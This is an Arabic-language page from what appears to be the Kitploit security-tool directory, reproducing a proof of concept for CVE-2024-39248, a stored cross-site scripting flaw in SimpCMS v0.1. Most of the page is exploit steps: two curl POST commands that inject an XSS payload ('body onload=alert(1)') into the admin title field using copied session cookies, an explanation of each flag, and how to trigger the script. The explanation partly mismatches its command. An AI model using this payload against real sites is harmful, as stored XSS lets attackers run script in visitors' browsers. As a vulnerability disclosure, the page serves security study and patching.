Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-39248 — منشور عن Cross Site Scripting (XSS) في SimpCMS v0.1 - /SimpCMS/admin.php | Kitploit
أدوات/GitHubGitHub/jasonthename/cve-2024-39248
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubjasonthename/cve-2024-39248

CVE-2024-39248

منشور عن Cross Site Scripting (XSS) في SimpCMS v0.1 - /SimpCMS/admin.php

عرض المستودع
1منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

عنوان الاستغلال: SimpCMS v0.1 - Cross Site Scripting (XSS)

CVE: CVE-2024-39248

مؤلف الاستغلال: Jason Jacobs (0xjason_jacobs - Twitter)

الصفحة الرئيسية للبائع: https://sourceforge.net/projects/simpcms/

نقطة النهاية القابلة للاستغلال: /SimpCMS/admin.php

ثغرة برمجية من نوع Cross-Site Scripting (XSS) في SimpCMS v0.1 تسمح للمهاجمين بتنفيذ نصوص برمجية تعسفية أو HTML عبر حمولة مصممة يتم حقنها في حقل العنوان (Title) في /admin.php.

معلمات أمر cURL المحدثة لإصدار SimpCMS المباشر على SourceForge:

بعد تسجيل الدخول إلى واجهة المشرف في SimpCMS، قم بنسخ قيم ملفات تعريف الارتباط (Cookie) الخاصة بك والتي تظهر في تبويب Application في أداة Inspect في المتصفح، ثم أرسل طلب curl التالي:

curl -X POST "http://site.com/SimpCMS/admin/index.php" -d "title=&abbrev=random&newSector=" -b "PHPSESSID=c4v4tjh5fpv4po3k5dp5mrb8r0"

command

poc

المعلمات من الإصدار الأولي لـ CVE (نفس الاستغلال يعمل):

المعلمات الأولية التي تم رصدها لبرنامج SimpCMS أدت إلى أمر cURL التالي ولكن تم تحديثها لاحقًا:

curl -X POST "http://site.com/SimpCMS/admin.php" -d "title=%3Cbody+onload%3Dalert%281%29%3E&text=ee&cat=something&main=1&submit=submit" -b "username=admin; password=PARAMVALUE"

الشرح:

  • curl: أداة سطر الأوامر لنقل البيانات عبر عناوين URL.
  • -X POST: يحدد طريقة الطلب المراد استخدامها (POST).
  • "http://site.com/SimpCMS/admin.php": عنوان URL الذي يتم إرسال الطلب إليه.
  • -d "title=&abbrev=random&newSector=" -b "PHPSESSID=c4v4tjh5fpv4po3k5dp5mrb8r0" - حمولة طلب POST.

قم بتشغيل هذا الأمر في الطرفية الخاصة بك لإرسال طلب POST مع حمولة XSS. قم بزيارة الموقع الرئيسي /SimpCMS وستظهر ثغرة XSS.

CWE: https://cwe.mitre.org/data/definitions/79.html

تنزيل الأداة